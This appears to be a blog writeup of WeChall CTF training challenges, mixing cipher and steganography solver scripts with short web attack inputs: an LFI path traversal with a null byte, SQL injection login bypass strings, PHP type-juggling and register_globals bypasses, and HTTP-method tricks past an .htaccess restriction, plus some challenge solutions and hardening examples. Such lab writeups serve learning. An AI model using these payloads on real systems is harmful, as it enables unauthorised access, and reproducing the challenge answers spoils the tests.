wechall writeup

2018/08/19 CTF

WeChall is a CTF site hosted abroad that quite a few people work through. This post records writeups for the WeChall challenges and is updated continuously...

1.Training: Get Sourced

View the page source.

2.Training: Stegano I

Open the image in a text editor.

3.Training: Crypto - Caesar I

A plain Caesar cipher.

4.Training: WWW-Robots

robots.txt

5.Training: ASCII

ASCII conversion.

6.Encodings: URL

URL decoding.

7.Prime Factory

def is_prime(num):
    """Trial division up to sqrt(num); fast enough for 7-digit numbers."""
    if num < 2:
        return False
    for i in range(2, int(num ** 0.5) + 1):
        if num % i == 0:
            return False
    return True


# Walk the 7-digit numbers upwards, keep the primes whose digit sum is
# itself prime, stop after two hits and output the two concatenated.
count = 2
res = ""
for num in range(1000000, 2000000):
    if is_prime(num):
        digit_sum = sum(int(d) for d in str(num))
        if is_prime(digit_sum):
            print(num)
            res += str(num)
            count -= 1
            if count == 0:
                break

print(res)

8.Training: Encodings I

Get familiar with the Java applet that WeChall provides.

9.Training: Programming 1

The point is that it cannot be done by hand.

#coding: utf-8
import requests

url1 = "https://www.wechall.net/challenge/training/programming1/index.php?action=request"
url2 = "https://www.wechall.net/challenge/training/programming1/index.php?answer={}"
rq = requests.Session()

# WC is the logged-in WeChall session cookie; the value is the author's and
# must be replaced with your own. The original passed the whole browser
# cookie string under a dummy name, which only worked because the server
# re-split it on ';'. The gsScrollPos-* cookies are not needed.
cookies = {"WC": "10718669-41869-tIrWzQ3iD9EFBssa"}
response1 = rq.get(url1, cookies=cookies)

# Submit the value from the request step straight away, from the same
# session; strip any trailing newline before putting it in the URL.
url2 = url2.format(response1.text.strip())
response2 = rq.get(url2, cookies=cookies)

print(response2.text)

10.Training: Regex

/^$/
/^wechall$/
/^wechall4?\.(?:jpg|gif|tiff|png|bmp)$/
#Note: this must match only wechall4.tiff, wechall.png, wechall4.jpg and wechall.bmp, and nothing else.
#(?:exp) => matches exp without capturing the matched text or assigning the group a number.

/^(wechall4?)\.(?:jpg|gif|tiff|png|bmp)$/

11.Training: PHP LFI

/challenge/training/php/lfi/up/index.php?file=../../solution.php%00

12.PHP 0817

When the case labels are numbers, PHP's switch uses loose comparison, so the switch argument is converted to an int for the comparison.

?which=solution

Here switch converts "solution" to 0, which bypasses the check.
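To show the type juggling behind this bypass and the strict alternative, here is an added example; it is mine, not the challenge's source (which the page does not show), and the function names and the page table are assumed:

```php
<?php
// Added example: why "?which=solution" lands on a numeric case, and a
// strict alternative. The challenge's real source is not shown on the
// page; the function names and the page table below are assumed.

// Weak: integer case labels are compared with == (loose comparison).
// Before PHP 8, a non-numeric string such as "solution" is converted to
// 0 for the comparison, so it matches "case 0". PHP 8 compares int vs
// non-numeric string as strings instead, and this bypass stops working.
function pick_loose($which) {
    switch ($which) {
        case 0:  return 'solution.php';   // meant only for which=0
        case 1:  return 'chall.php';
        default: return 'index.php';
    }
}

// Hardened: validate the shape of the input before any comparison and
// look the index up in a whitelist; no implicit type conversion occurs.
function pick_strict($which) {
    $pages = [0 => 'solution.php', 1 => 'chall.php'];
    if (!is_string($which) || !ctype_digit($which)) {
        return 'index.php';                // non-digit input is rejected
    }
    $idx = (int)$which;
    return array_key_exists($idx, $pages) ? $pages[$idx] : 'index.php';
}

// Constructed inputs: the bypass string, a legitimate index, and junk.
foreach (['solution', '0', '1', 'abc'] as $input) {
    printf("%-10s loose=%-13s strict=%s\n",
        var_export($input, true), pick_loose($input), pick_strict($input));
}
```

Run it under PHP 7 and PHP 8 side by side to see the loose branch change behaviour while the strict one does not.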

13.Training: Crypto - Transposition I

Go here: https://www.dcode.fr/transposition-cipher

BY KNOWING THE KEY LENGTH => choose 4

14.Training: Crypto - Substitution I

Monoalphabetic substitution cipher: https://quipqiup.com/ The answer has to be lowercased.

15.Training: Crypto - Caesar II

a = """
6C 14 14 09 20 0F 14 07 51 20 1E 14 1A 20 18 14
11 1B 0A 09 20 14 13 0A 20 12 14 17 0A 20 08 0D
06 11 11 0A 13 0C 0A 20 0E 13 20 1E 14 1A 17 20
0F 14 1A 17 13 0A 1E 53 20 79 0D 0E 18 20 14 13
0A 20 1C 06 18 20 0B 06 0E 17 11 1E 20 0A 06 18
1E 20 19 14 20 08 17 06 08 10 53 20 7C 06 18 13
4C 19 20 0E 19 64 20 56 57 5D 20 10 0A 1E 18 20
0E 18 20 06 20 16 1A 0E 19 0A 20 18 12 06 11 11
20 10 0A 1E 18 15 06 08 0A 51 20 18 14 20 0E 19
20 18 0D 14 1A 11 09 13 4C 19 20 0D 06 1B 0A 20
19 06 10 0A 13 20 1E 14 1A 20 19 14 14 20 11 14
13 0C 20 19 14 20 09 0A 08 17 1E 15 19 20 19 0D
0E 18 20 12 0A 18 18 06 0C 0A 53 20 7C 0A 11 11
20 09 14 13 0A 51 20 1E 14 1A 17 20 18 14 11 1A
19 0E 14 13 20 0E 18 20 0B 12 14 17 11 18 14 13
09 0B 0A 13 53
"""
# The ciphertext is given as hex bytes; split on any whitespace.
data = a.split()
print(data)

# The "alphabet" here is the byte range rather than A-Z, so the shift can be
# anything from 26 up to 128. Brute-force every shift, wrapping at 128 as
# the author did, and read off the one that gives English text.
for k in range(0, 129):
	res = ""
	for h in data:
		tmp = int(h, 16)
		if tmp + k > 128:
			ch = chr(tmp + k - 128)
		else:
			ch = chr(tmp + k)
		res += ch
	print(res)
	print("#############################################################")

16.Training: Crypto - Digraphs

Start by guessing that the first word is congratulations, then build up the mapping table step by step; it is a bit like sudoku.

#coding: utf-8
a = "uansbneeuqxirstnvnxirsjznsbntvgj ninstn ggwkffuqyuqprswkgg rsejjztv iowktvtvxieewk tvtnffffwktvtvpftnvnvnyugj vexitv bnnsrs rsnsns ggjzpfpfjzfftnvnrs wkjzrsejwkuqex xyxitv jzrsqb vewkvnvnex eensnsgg fxnssugj kvbnrswkuq rsejjztv oqwkyuxynsuqgg xitv tvnsvntnrsjznsbnjt vnvnnseejzpfpfvnpfejejpfgj"
data = a.split()

# Each pair of letters (a digraph) stands for one plaintext character.
# Seed the table by assuming the first word is "congratulations".
data_A = {}
ans = "congratulations"

for i in range(len(ans)):
	tmp = data[0][2*i] + data[0][2*i+1]
	data_A[tmp] = ans[i]

print(data_A)

# Run the program once first, then add the mappings worked out from the
# partially decoded output here and run it again.
data_A["ni"] = "y"
data_A["ej"] = "h"
data_A["gg"] = "d"
data_A["io"] = "m"
data_A["wk"] = "e"
data_A["pf"] = "f"
data_A["ff"] = "c"
data_A["gj"] = "!"


# Decode every word; digraphs not yet in the table are printed as "*".
for word in data:
	res = ""
	for k in range(len(word) // 2):
		tmp = word[2*k] + word[2*k+1]
		res += data_A.get(tmp, "*")
	print(res)

17.Training: MySQL I

admin'#&1

18.Training: MySQL II

' union select md5(1),'admin',md5(1)#&1

19.Training: WWW-Basics

This challenge needs a server you control. Setting one up locally requires configuring the router, which I could not do at the time. The alternative is a proxy: set a system-wide proxy, and the challenge then sees your proxy server's IP, so create the required file on the proxy server. (Note that if you use SS, the proxy server must not be in mainland China.) Note: spoofing via XFF does not work.

20.Training: Register Globals

//Note for this challenge: register_globals = on
if (isset($login))
{
        echo GWF_HTML::message('Register Globals', $chall->lang('msg_welcome_back',
                array(htmlspecialchars($login[0]), htmlspecialchars($login[1]))));
        if (strtolower($login[0]) === 'admin') {
                $chall->onChallengeSolved(GWF_Session::getUserID());
        }
}

So all it takes is ?login[0]=admin

21.Training: Math Pyramid

a^3/18^.5

Rationalize the numerator; this one is nasty.

22.Training: Baconian

Bacon cipher => decode it here

#coding: utf-8
# First pass (kept commented out, as in the original): turn the mixed-case
# cover text into the a/b stream. Uppercase -> 'b', lowercase -> 'a',
# everything else is dropped. The result is then fed to the Baconian decoder.
"""
a = "BaCoN's cIphEr or THE bacOnIAN CiPHer iS a meThOD oF sTEGaNOGrapHY (a METhoD Of HidIng A sECRet MeSsaGe as OpPOsEd TO a TRUe CiPHeR) dEVIseD BY francis bAcoN. a MessAge Is coNCeALED in THe pRESenTatIoN OF TexT, ratHer thaN iTs coNteNt. tO enCODe A MEsSaGe, eaCh lETter Of THe pLAInText Is rePLAcED By A groUp oF fIvE OF thE LEtTers 'a' oR 'B'. this rEPlaCemENt Is done acCOrdiNg To THE alPHAbeT OF tHe BACOnIAN cIpHeR, sHoWn bElOw. NoTe: A SeCoNd vErSiOn oF BaCoN'S CiPhEr uSeS A UnIqUe cOdE FoR EaCh lEtTeR. iN OtHeR WoRdS, i aNd j eAcH HaS ItS OwN PaTtErN. tHe wRiTeR MuSt mAkE UsE Of tWo dIfFeReNt tYpEfAcEs fOr tHiS CiPhEr. AfTeR PrEpArInG A FaLsE MeSsAgE WiTh tHe sAmE NuMbEr oF LeTtErS As aLl oF ThE As aNd bS In tHe rEaL, sEcReT MeSsAgE, tWo tYpEfAcEs aRe cHoSeN, oNe tO RePrEsEnT As aNd tHe oThEr bS. tHeN EaCh lEtTeR Of tHe fAlSe mEsSaGe mUsT Be pReSeNtEd iN ThE ApPrOpRiAtE TyPeFaCe, AcCoRdInG To wHeThEr iT StAnDs fOr aN A Or a b. To dEcOdE ThE MeSsAgE, tHe rEvErSe mEtHoD Is aPpLiEd. EaCh 'TyPeFaCe 1' LeTtEr iN ThE FaLsE MeSsAgE Is rEpLaCeD WiTh aN A AnD EaCh 'TyPeFaCe 2' LeTtEr iS RePlAcEd wItH A B. tHe bAcOnIaN AlPhAbEt iS ThEn uSeD To rEcOvEr tHe oRiGiNaL MeSsAgE. aNy mEtHoD Of wRiTiNg tHe mEsSaGe tHaT AlLoWs tWo dIsTiNcT RePrEsEnTaTiOnS FoR EaCh cHaRaCtEr cAn bE UsEd fOr tHe bAcOn cIpHeR. bAcOn hImSeLf pRePaReD A BiLiTeRaL AlPhAbEt[2] FoR HaNdWrItTeN CaPiTaL AnD SmAlL LeTtErS WiTh eAcH HaViNg tWo aLtErNaTiVe fOrMs, OnE To bE UsEd aS A AnD ThE OtHeR As b. ThIs wAs pUbLiShEd aS An iLlUsTrAtEd pLaTe iN HiS De aUgMeNtIs sCiEnTiArUm (ThE AdVaNcEmEnT Of lEaRnInG). BeCaUsE AnY MeSsAgE Of tHe rIgHt lEnGtH CaN Be uSeD To cArRy tHe eNcOdInG, tHe sEcReT MeSsAgE Is eFfEcTiVeLy hIdDeN In pLaIn sIgHt. ThE FaLsE MeSsAgE CaN Be oN AnY ToPiC AnD ThUs cAn dIsTrAcT A PeRsOn sEeKiNg tO FiNd tHe rEaL MeSsAgE."
a = list(a)


for i in range(len(a)):
	if 'A' <= a[i] <= 'Z':
		a[i] = 'b'
	elif 'a' <= a[i] <= 'z':
		a[i] = 'a'
	else:
		a[i] = ""
print("".join(a))

"""
# Output of the Baconian decoder; X stands for a space.
res = "VERYXWELLXDONEXFELLOWXHACKERXTHEXSECRETXKEYWORDXISXHIGBSNAGFOOOXXKVFKSUJOUWKWWURNWVFNFWJKSVEWVLKXLKJNJVMTMTEVLKUVJFKNKZEUVUVSKKSZKTNKWVKVSUSOEVWVJKKZKVKVJWWVSVUVKVJVJOSVVJUWKSKWVJLFJFJNJFLKVLNFKJUSKKVFJKKVNKWVWWVUWUSVJKZUWWKJKTFKSTMVJKVNKWKWVWVSKKFSSKVFNLFKSWKKWWVWNVWSKXKKTJFV"

res = res.replace("X", " ").lower()
print(res)

23.Training: LSB

A steganography challenge, solved with the official Java applet steganabara. I used to skip these; here I followed this reference.

LSB (least significant bit)

24.Training: GPG

This one is rather fiddly. I followed this reference, plus Ruan Yifeng's article on gpg, GPG入门教程 (a GPG beginner's tutorial).

I started in Kali. Following the steps one by one was fine at first, but I could never decrypt the mail WeChall sent; it kept erroring with

gpg: WARNING: no command supplied.  Trying to guess what you mean ...
gpg: no valid OpenPGP data found.
gpg: processing message failed: 未知的系统错误

Then I tried on a Mac and hit the same error. It turned out to be a formatting problem in the copied ciphertext: every space in the mail's ciphertext has to be manually converted to a newline when pasting it into the file.

Steps:

gpg2 --gen-key

gpg2 --armor --output public-key.txt --export  "YYXXP <2281XXXX95@qq.com>"

touch secret.txt
gpg2 secret.txt

25.Limited Access

AuthUserFile .htpasswd
AuthGroupFile /dev/null
AuthName "Authorization Required for the Limited Access Challenge"
AuthType Basic
<Limit GET>
require valid-user
</Limit>

A quick look at the source: only GET is restricted, so just access it with POST.

26.Limited Access Too

Compared with the previous one, this challenge blocks a few more HTTP methods, but not all of them.

GET
	The GET method requests a representation of the specified resource. Requests using GET should only retrieve data.
HEAD
	The HEAD method asks for a response identical to a GET request, but without the response body.
POST
	The POST method submits an entity to the specified resource, often causing a change in state or side effects on the server.
PUT
	The PUT method replaces all current representations of the target resource with the request payload.
DELETE
	The DELETE method deletes the specified resource.
CONNECT
	The CONNECT method establishes a tunnel to the server identified by the target resource.
OPTIONS
	The OPTIONS method describes the communication options for the target resource.
TRACE
	The TRACE method performs a message loop-back test along the path to the target resource.
PATCH
	The PATCH method applies partial modifications to a resource.

//For this one I used PATCH
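For challenges 25 and 26, the server-side fix as an added example (mine, not the challenge's own configuration): `<Limit>` applies the enclosed directives only to the methods listed, so every method that is not listed goes through without authentication.

```apache
# Added example for challenges 25/26 (mine, not the challenge's config):
# <Limit> applies the enclosed directives ONLY to the listed methods, so
# the original leaves POST, PATCH and every other method unauthenticated.
# Apache treats GET as covering HEAD as well, but nothing else.
AuthUserFile .htpasswd
AuthGroupFile /dev/null
AuthName "Authorization Required for the Limited Access Challenge"
AuthType Basic

# Weak (the original): authentication enforced for GET/HEAD only.
#<Limit GET>
#    Require valid-user
#</Limit>

# Fix: an unwrapped Require applies to all methods, including ones the
# server does not otherwise know about.
Require valid-user

# If some method really must stay open, use <LimitExcept>, which lists
# the methods that are NOT covered and protects everything else.
#<LimitExcept OPTIONS>
#    Require valid-user
#</LimitExcept>
```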

27.Shadowlamb - Chapter I

Following this reference, we arrive at a game.

The client I used is Textual.

Ugah made game. You play game. You #use ScrollOfWisdom.

Server to connect to: irc.gizmore.org
Channel: #shadowlamb

#exp keeps finding small monsters to fight, which earns gold

Your attributes: body:1(2), magic:1(5), quickness:3(6), wisdom:0(2), intelligence:2(6), charisma:1(5), luck:0, reputation:0, essence:6.
#lvlup body  levels up an attribute; each level-up costs 4 karma

#use FirstAid raises your HP

#use XXX
#eq XXX  followed by the item code

#ny shows how much money you currently have
#goto Redmond_Alchemist go here to buy the flag
#use ScrollOfWisdom gets you the flag

28.Training: Warchall - The Beginning

step1: create an account

step2: ssh -p 19198 catcher@warchall.net

At this point the directory contains two files: level WELCOME.txt

First look at WELCOME.txt

You will find the solution to each level in 
/home/level
or
/home/user/yournick/level

It mentions two paths. Under level I only see 4, 5 and 6, so go to /home/level for 1, 2 and 3.

$catcher@warchall /home/level/0 $ cat README.txt 
bitwarrior

$catcher@warchall /home/level/1 $ grep -rn "solution"*
LameStartup

$catcher@warchall /home/level/2 $ grep -rn "solution"*
.porb/.solution:1:The solution is HiddenIsConfig
grep: .ssh: 权限不够
.bash_history:8:nano .porb/.solution
$catcher@warchall /home/level/2/.porb $ ls -a
HiddenIsConfig

$catcher@warchall /home/level/3 $ grep -rn "solution"*
RepeatingHistory

Extra:

grep -rn "hello,world!" *

* : all files in the current directory; can also be a specific file name
-r recursive search
-n show line numbers
-R search all files including subdirectories
-i ignore case

For 4, 5 and 6 below, the directory changes.

$catcher@warchall ~/level/4 $ cat README.txt 
cat: README.txt: 权限不够
$catcher@warchall ~/level/4 $ ls -l    <=>  check the permissions
总用量 4
---------- 1 catcher catcher 63 8月  23 15:35 README.txt

Both the owner and the group are me, so just add read permission.

$catcher@warchall ~/level/4 $ chmod 700 README.txt 
$catcher@warchall ~/level/4 $ cat README.txt 
AndIknowchown
$catcher@warchall ~/level/5 $ cat README.txt 
Protect your /home/user/catcher/level directory from other users. Then wait 5 minutes.

$catcher@warchall ~ $ ls -l
总用量 8
drwx---r-x 5 catcher catcher 4096 8月  23 15:35 level
-r--r--r-- 1 catcher catcher  463 1月  18 2014 WELCOME.txt
$catcher@warchall ~/level/5 $ cat solution.txt 
cat: solution.txt: 权限不够
$catcher@warchall ~/level/5 $ chmod 700 solution.txt
$catcher@warchall ~/level/5 $ cat solution.txt 
The solution to level 5 is 'OhRightThePerms', without the quotes.
OhRightThePerms

bitwarrior,LameStartup,HiddenIsConfig,RepeatingHistory,AndIknowchown,OhRightThePerms


Reference: [WeChall] Training: Warchall – The Beginning (Realistic, Linux, Shell, Warchall)

29.Repeating History

First find the challenge's folder in the project's GitHub repository.

The first part is in the repeating folder.

The second part is in the history folder: search the history of install.php to find the correct solution.

30.PHP My Admin

For this one, read the hints given in the discussion forum.

Look up where phpMyAdmin is usually installed. http://www.wechall.net/phpmyadmin is by far the most common, and http://www.wechall.net/pma is also used, since phpMyAdmin is commonly abbreviated to pma.

https://pma.wechall.net/

31.Training: Caterpillar

32.AUTH me

tips: find the p12 certificate under the find_me path, then import it into your certificates in Firefox. When prompted for a password, it is empty.

33.Interesting

34.Wanda

35.Railsbin

36.Connect the Dots

Braille code; just find the corresponding Braille table.

thesolutionisXXX

37.hi

Big-number arithmetic; I found an online tool, wolframalpha.

38.Stegano Woman

If you extract this with an off-the-shelf tool you will definitely not solve it.

$ unzip stegano_woman.zip

Output:

Archive:  stegano_woman.zip
Stegano
	 	 	 			  	 			  		 	 		 					   		  	  	    	  	  			   	   	 			  	 		 	  	    	  	   			 						  	 		 	   		  		 		  		 			  				 	  	   		  		   	  		 	 	   		 		  	    	   	 	 	   	  		 						  	  	  	 		 	  		  		  		   	
  inflating: 1.jpg                   
  inflating: 2.jpg       

Opening it in a hex editor shows that the blank section in the middle consists of 09 (tab) and 20 (space).

Treat one of them as 1 and the other as 0, convert the resulting binary to a string and print it.

#coding: utf-8
# Read the zip as raw bytes; the hidden message is the run of tab/space
# bytes that follows the text "Stegano" (what unzip printed above).
with open('stegano_woman.zip', 'rb') as f:
    data = f.read()

index = data.find(b'Stegano')
# index is the offset of the 'S'

# [b'S', b't', b'e', b'g', b'a', b'n', b'o', b'\r', b'\n'] -> 9 bytes,
# so the whitespace payload starts 9 bytes in.
payload = data[index + 9:]

# space (0x20) -> '1', tab (0x09) -> '0'; stop at the first other byte,
# which is where the hidden run ends.
bits = ""
for b in payload:
    if b == 0x20:
        bits += "1"
    elif b == 0x09:
        bits += "0"
    else:
        break

s = ""
for i in range(len(bits) // 8):
    s += chr(int(bits[i*8:i*8+8], 2))

print(s)
